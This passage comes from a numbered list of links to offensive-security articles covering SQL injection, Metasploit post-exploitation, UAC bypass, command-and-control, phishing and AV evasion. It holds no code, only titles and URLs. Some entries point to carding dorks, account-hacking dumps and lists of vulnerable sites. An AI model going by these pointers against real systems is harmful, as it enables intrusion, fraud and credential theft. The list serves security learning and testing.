Sqlmap and Burp Suite (Burp CO2 Plugin): http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin -472-SSH Penetration Testing (Port 22): http://www.hackingarticles.in/ssh-penetration-testing-port-22 -473-Manual Post Exploitation on Windows PC (System Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command -474-SSH Pivoting using Meterpreter: http://www.hackingarticles.in/ssh-pivoting-using-meterpreter -475-Stealing Windows Credentials of Remote PC with MS Office Document: http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document -476-Telnet Pivoting through Meterpreter: http://www.hackingarticles.in/telnet-pivoting-meterpreter -477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin): http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin -478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit: http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit -479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit: http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit -480-Hack Remote Windows 10 PC using TheFatRat: http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat -481-2 Ways to Hack Windows 10 Password Easy Way: http://www.hackingarticles.in/hack-windows-10-password-easy-way -482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack): http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack -483-How to Delete ALL Files in Remote Windows PC: http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2 -484-How to Encrypt Drive of Remote Victim PC: http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc -485-Post Exploitation in Linux With Metasploit: https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit -486-Red Team: https://posts.specterops.io/tagged/red-team?source=post -487-Code Signing Certi cate Cloning Attacks and Defenses: https://posts.specterops.io/tagged/code-signing?source=post -488-Phishing: https://posts.specterops.io/tagged/phishing?source=post -489-PowerPick – A ClickOnce Adjunct: http://www.sixdub.net/?p=555 -490-sql-injection-xss-playground: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground -491-Privilege Escalation & Post-Exploitation: https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md -492-https-payload-and-c2-redirectors: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41 -493-a-push-toward-transparency: https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41 -494-bloodhound: https://posts.specterops.io/tagged/bloodhound?source=post -495-active directory: https://posts.specterops.io/tagged/active-directory?source=post -496-Load & Execute Bundles with migrationTool: https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41 -497-Outlook Forms and Shells: https://sensepost.com/blog/2017/outlook-forms-and-shells/ -498-Tools: https://sensepost.com/blog/tools/ -499-2018 pentesting resources: https://sensepost.com/blog/2018/ -500-network pentest: https://securityonline.info/category/penetration-testing/network-pentest/ -501-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -502-Stored XSS on Facebook: https://opnsec.com/2018/03/stored-xss-on-facebook/ -503-vulnerabilities: https://www.brokenbrowser.com/category/vulnerabilities/ -504-Extending BloodHound: Track and Visualize Your Compromise: https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise -505-so-you-want-to-be-a-web-security-researcher: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher -506-BugBounty — AWS S3 added to my “Bucket” list!: https://medium.com/p/f68dd7d0d1ce -507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company: https://medium.com/p/c75967392c7e -508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty: https://medium.com/p/159525a9cb62 -509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account: https://medium.com/p/783f71131b94 -510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -511-Ping Power — ICMP Tunnel: https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41 -512-hacking: https://www.nextleveltricks.com/hacking/ -513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !: https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/ -514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi: https://www.nextleveltricks.com/latest-google-dorks-list/ -515-Art of Shellcoding: Basic AES Shellcode Crypter: http://www.nipunjaswal.com/2018/02/shellcode-crypter.html -516-Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/ -517-nmap-cheatsheet: https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/ -518-Aws Recon: https://enciphers.com/tag/aws-recon/ -519-Recon: https://enciphers.com/tag/recon/ -520-Subdomain Enumeration: https://enciphers.com/tag/subdomain-enumeration/ -521-Shodan: https://enciphers.com/tag/shodan/ -522-Dump LAPS passwords with ldapsearch: https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/ -523-peepdf - PDF Analysis Tool: http://eternal-todo.com/tools/peepdf-pdf-analysis-tool -524-Evilginx 2 - Next Generation of Phishing 2FA Tokens: breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ -526-Evil XML with two encodings: https://mohemiv.com/all/evil-xml/ -527-create-word-macros-with-powershell: https://4sysops.com/archives/create-word-macros-with-powershell/ -528-Excess XSS A comprehensive tutorial on cross-site scripting: https://excess-xss.com/ -529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -530-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -532-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -533-“Practical recon techniques for bug hunters & pen testers”: https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41 -534-Exploiting Node.js deserialization bug for Remote Code Execution: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege: http://www.greyhathacker.net/?p=1006 -536-Running Macros via ActiveX Controls: http://www.greyhathacker.net/?p=948 -537-all=BUG+MALWARE+EXPLOITS http://www.greyhathacker.net/?cat=18 -538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking -539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests: https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/ -541-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe -542-File Upload XSS: https://medium.com/p/83ea55bb9a55 -543-Firebase Databases: https://medium.com/p/f651a7d49045 -544-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac -545-RED-TEAM: https://cybersyndicates.com/tags/red-team/ -546-Egressing Bluecoat with Cobaltstike & Let's Encrypt: https://www.youtube.com/watch?v=cgwfjCmKQwM -547-Veil-Evasion: https://cybersyndicates.com/tags/veil-evasion/ -548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -549-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -550-Don’t leak sensitive data via security scanning tools: https://medium.com/p/7d1f715f0486 -551-CRLF Injection Into PHP’s cURL Options: https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60 -552-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60 -553-DOM XSS – auth.uber.com: https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html -554-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -555-exploiting-adobe-coldfusion: https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html -556-Command and Control – HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https -557-Command and Control – Images: https://pentestlab.blog/2018/01/02/command-and-control-images -558-Command and Control – JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript -559-XSS-Payloads: https://github.com/Pgaijin66/XSS-Payloads -560-Command and Control – Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface -561-Command and Control – Website: https://pentestlab.blog/2017/11/14/command-and-control-website -562-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -563-atomic-red-team: https://github.com/redcanaryco/atomic-red-team -564-PowerView-3.0-tricks.ps1: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 -565-awesome-sec-talks: https://github.com/PaulSec/awesome-sec-talks -566-Awesome-Red-Teaming: https://github.com/yeyintminthuhtut/Awesome-Red-Teaming -567-awesome-php: https://github.com/ziadoz/awesome-php -568-latest-hacks: https://hackercool.com/latest-hacks/ -569-GraphQL NoSQL Injection Through JSON Types: http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/ -570-Writing .NET Executables for Pentesters: https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2 -571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. https://github.com/secfigo/Awesome-Fuzzing -572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC: http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc -572-Injecting Metasploit Payloads into Android Applications – Manually: https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually -573-Google Dorks For Carding [Huge List] - Part 1: https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html -574-Google dorks for growth hackers: https://medium.com/p/7f83c8107057 -575-Google Dorks For Carding (HUGE LIST): https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html -576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks: https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html -577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc): https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html -578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html -579-Hijacking VNC (Enum, Brute, Access and Crack): https://medium.com/p/d3d18a4601cc -580-Linux Post Exploitation Command List: https://github.com/mubix/post-exploitation/wiki -581-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -582-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset -583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability: https://www.securityfocus.com/bid/104407 -585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability: https://www.securityfocus.com/bid/104382 -586-miSafes Mi-Cam Device Hijacking: https://packetstormsecurity.com/files/146504/SA-20180221-0.txt -587-Low-Level Windows API Access From PowerShell: https://www.fuzzysecurity.com/tutorials/24.html -588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability: https://www.securityfocus.com/bid/103316 -589-Lateral Movement – RDP: https://pentestlab.blog/2018/04/24/lateral-movement-rdp/ -590-Snagging creds from locked machines: https://malicious.link/post/2016/snagging-creds-from-locked-machines/ -591-Making a Blind SQL Injection a Little Less Blind: https://medium.com/p/428dcb614ba8 -592-VulnHub — Kioptrix: Level 5: https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60 -593-Unauthenticated Account Takeover Through HTTP Leak: https://medium.com/p/33386bb0ba0b -594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43 -595-Finding Target-relevant Domain Fronts: https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44 -596-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60 -597-Cobalt Strike Visualizations: https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60 -598-OWASP Top 10 2017 — Web Application Security Risks: https://medium.com/p/31f356491712 -599-XSS-Auditor — the protector of unprotected: https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60 -600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine: https://gbhackers.com/netcat-vs-cryptcat -601-Jenkins Servers Infected With Miner.: https://medium.com/p/e370a900ab2e -602-cheat-sheet: http://pentestmonkey.net/category/cheat-sheet -603-Command and Control – Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ -604-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -605-Command and Control – Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ -606-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ -607-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -608-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -609-Reverse Engineering Android Applications: https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/ -610-HTML Injection: https://pentestlab.blog/2013/06/26/html-injection/ -611-Meterpreter stage AV/IDS evasion with powershell: https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/ -612-Windows Atomic Tests by ATT&CK Tactic & Technique: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md -613-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware: http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml -615-How to Bypass Anti-Virus to Run Mimikatz: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ -616-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -617-USE TOR. USE EMPIRE.: http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html -617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET: https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/ -618-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -619-RED TEAM: https://bneg.io/category/red-team/ -620-PDF Tools: https://blog.didierstevens.com/programs/pdf-tools/ -621-DNS Data ex ltration — What is this and How to use? https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822 -621-Google Dorks: https://medium.com/p/7cfd432e0cf3 -622-Hacking with JSP Shells: https://blog.netspi.com/hacking-with-jsp-shells/ -623-Malware Analysis: https://github.com/RPISEC/Malware/raw/master/README.md -624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.: https://github.com/SandySekharan/CTF-tool -625-Group Policy Preferences: https://pentestlab.blog/2017/03/20/group-policy-preferences -627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -628-deobfuscation: https://furoner.wordpress.com/tag/deobfuscation/ -629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS: https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/ -630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING: https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/ -631-GCAT – BACKDOOR EM PYTHON: https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/ -632-Latest Carding Dorks List for Sql njection 2019: https://latestechnews.com/carding-dorks/ -633-google docs for credit card: https://latestechnews.com/tag/google-docs-for-credit-card/ -634-How To Scan Multiple Organizations With Shodan and Golang (OSINT): https://medium.com/p/d994ba6a9587 -635-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -636-phishing: https://www.blackhillsinfosec.com/tag/phishing/ -637-Merlin in action: Intro to Merlin: https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I -638-IP Cams from around the world: https://medium.com/p/a6f269f56805 -639-Advanced Cross Site Scripting(XSS) Cheat Sheet by Jaydeep Dabhi: https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/ -640-Just how easy it is to do a domain or subdomain take over!?: https://medium.com/p/265d635b43d8 -641-How to Create hidden user in Remote PC: http://www.hackingarticles.in/create-hidden-remote-metaspolit -642-Process Doppelgänging – a new way to impersonate a process: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ -643-How to turn a DLL into astandalone EXE: https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/ -644-Hijacking extensions handlers as a malware persistence method: https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/ -645-I'll Get Your Credentials ... Later!: https://www.fuzzysecurity.com/tutorials/18.html -646-Game Over: CanYouPwnMe > Kevgir-1: https://www.fuzzysecurity.com/tutorials/26.html -647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities: http://www.greyhathacker.net/?p=995 -648-Getting started in Bug Bounty: https://medium.com/p/7052da28445a -649-Union SQLi Challenges (Zixem Write-up): https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60 -650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites: https://gbhackers.com/scanless-port-scans-websites-behalf -651-WEBAPP PENTEST: https://securityonline.info/category/penetration-testing/webapp-pentest/ -652-Cross-Site Scripting (XSS) Payloads: https://securityonline.info/tag/cross-site-scripting-xss-payloads/ -653-sg1: swiss army knife for data encryption, exfiltration & covert communication: https://securityonline.info/tag/sg1/ -654-NETWORK PENTEST: https://securityonline.info/category/penetration-testing/network-pentest/ -655-SQL injection in an UPDATE query - a bug bounty story!: https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html -656-Cross-site Scripting: https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ -657-Local File Inclusion: https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ -658-Command Injection: https://www.netsparker.com/blog/web-security/command-injection-vulnerability/ -659-a categorized list of Windows CMD commands: https://ss64.com/nt/commands.html -660-Understanding Guide for Nmap Timing Scan (Firewall Bypass): http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass -661-RFID Hacking with The Proxmark 3: https://blog.kchung.co/tag/rfid/ -662-A practical guide to RFID badge copying: https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying -663-Denial of Service using Cookie Bombing: https://medium.com/p/55c2d0ef808c -664-Vultr Domain Hijacking: https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking -665-Command and Control: https://vincentyiu.co.uk/red-team/domain-fronting -666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers: https://gbhackers.com/cisco-global-exploiter-cge -667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -668-Situational Awareness: https://pentestlab.blog/2018/05/28/situational-awareness/ -669-Unquoted Service Path: https://pentestlab.blog/2017/03/09/unquoted-service-path -670-NFS: https://pentestacademy.wordpress.com/2017/09/20/nfs/ -671-List of Tools for Pentest Rookies: https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/ -672-Common Windows Commands for Pentesters: https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/ -673-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -674-OSINT x UCCU Workshop on Open Source Intelligence: https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence -675-Advanced Attack Techniques: https://www.cyberark.com/threat-research-category/advanced-attack-techniques/ -676-Credential Theft: https://www.cyberark.com/threat-research-category/credential-theft/ -678-The Cloud Shadow Admin Threat: 10 Permissions to Protect: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ -679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk: https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/ -680-Weakness Within: Kerberos Delegation: https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/ -681-Simple Domain Fronting PoC with GAE C2 server: https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/ -682-Find Critical Information about a Host using DMitry: https://www.thehackr.com/find-critical-information-host-using-dmitry/ -683-How To Do OS Fingerprinting In Kali Using Xprobe2: http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA -684-Crack SSH, FTP, Telnet Logins Using Hydra: https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/ -685-Reveal Saved Passwords in Browser using JavaScript Injection: https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/ -686-Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf -687-Manual Post Exploitation on Windows PC (Network Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command -688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool: http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool -689-Hack Locked Workstation Password in Clear Text: http://www.hackingarticles.in/hack-locked-workstation-password-clear-text -690-How to Find ALL Excel, Office, PDF, and Images in Remote PC: http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc -691-red-teaming: https://www.redteamsecure.com/category/red-teaming/ -692-Create a Fake AP and Sniff Data mitmAP: http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/ -693-Bruteforcing From Nmap Output BruteSpray: http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/ -694-Reverse Engineering Framework radare2: http://www.uaeinfosec.com/reverse-engineering-framework-radare2/ -695-Automated ettercap TCP/IP Hijacking Tool Morpheus: http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/ -696-List Of Vulnerable SQL Injection Sites: https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199 -697-Command and Control – Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/ -698-Command and Control – DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ -699-Skeleton Key: https://pentestlab.blog/2018/04/10/skeleton-key/ -700-Secondary Logon Handle: https://pentestlab.blog/2017/04/07/secondary-logon-handle -701-Hot Potato: https://pentestlab.blog/2017/04/13/hot-potato -702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -703-Linux-Kernel-exploits: http://tacxingxing.com/category/exploit/kernel-exploit/ -704-Linux-Kernel-Exploit Stack Smashing: http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/ -705-Linux Kernel Exploit Environment: http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/ -706-Linux-Kernel-Exploit NULL dereference: http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/ -707-Apache mod_python for red teams: https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/ -708-Bounty Write-up (HTB): https://medium.com/p/9b01c934dfd2/ 709-CTF Writeups: https://medium.com/ctf-writeups -710-Detecting Malicious Microsoft Office Macro Documents: http://www.greyhathacker.net/?p=872 -711-SQL injection in Drupal: https://hackerone.com/reports/31756 -712-XSS and open redirect on Twitter: https://hackerone.com/reports/260744 -713-Shopify login open redirect: https://hackerone.com/reports/55546 -714-HackerOne interstitial redirect: https://hackerone.com/reports/111968 -715-Ubiquiti sub-domain takeovers: https://hackerone.com/reports/181665 -716-Scan.me pointing to Zendesk: https://hackerone.com/reports/114134 -717-Starbucks' sub-domain takeover: https://hackerone.com/reports/325336 -718-Vine's sub-domain takeover: https://hackerone.com/reports/32825 -719-Uber's sub-domain takeover: https://hackerone.com/reports/175070 -720-Read access to Google: https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ -721-A Facebook XXE with Word: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/ -722-The Wikiloc XXE: https://www.davidsopas.com/wikiloc-xxe-vulnerability/ -723-Uber Jinja2 TTSI: https://hackerone.com/reports/125980 -724-Uber Angular template injection: https://hackerone.com/reports/125027 -725-Yahoo Mail stored XSS: https://klikki.fi/adv/yahoo2.html -726-Google image search XSS: https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html -727-Shopify Giftcard Cart XSS : https://hackerone.com/reports/95089 -728-Shopify wholesale XSS : https://hackerone.com/reports/106293 -729-Bypassing the Shopify admin authentication: https://hackerone.com/reports/270981 -730-Starbucks race conditions: https://sakurity.com/blog/2015/05/21/starbucks.html -731-Binary.com vulnerability – stealing a user's money: https://hackerone.com/reports/98247 -732-HackerOne signal manipulation: https://hackerone.com/reports/106305 -733-Shopify S buckets open: https://hackerone.com/reports/98819 -734-HackerOne S buckets open: https://hackerone.com/reports/209223 -735-Bypassing the GitLab 2F authentication: https://gitlab.com/gitlab-org/gitlab-ce/issues/14900 -736-Yahoo PHP info disclosure: https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ -737-Shopify for exporting installed users: https://hackerone.com/reports/96470 -738-Shopify Twitter disconnect: https://hackerone.com/reports/111216 -739-Badoo full account takeover: https://hackerone.com/reports/127703 -740-Disabling PS Logging: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs -741-macro-less-code-exec-in-msword: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ -742-5 ways to Exploiting PUT Vulnerability: http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit -743-5 Ways to Exploit Verb Tempering Vulnerability: http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability -744-5 Ways to Hack MySQL Login Password: http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password -745-5 Ways to Hack SMB Login Password: http://www.hackingarticles.in/5-ways-to-hack-smb-login-password -746-6 Ways to Hack FTP Login Password: http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password -746-6 Ways to Hack SNMP Password: http://www.hackingarticles.in/6-ways-to-hack-snmp-password -747-6 Ways to Hack VNC Login Password: http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password -748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter: http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter -749-Beginner Guide to IPtables: http://www.hackingarticles.in/beginner-guide-iptables -750-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -751-Exploit Remote Windows 10 PC using Discover Tool: http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool -752-Forensics Investigation of Remote PC (Part 2): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2 -753-5 ways to File upload vulnerability Exploitation: http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation -754-FTP Penetration Testing in Ubuntu (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21 -755-FTP Penetration Testing on Windows (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-windows -756-FTP Pivoting through RDP: 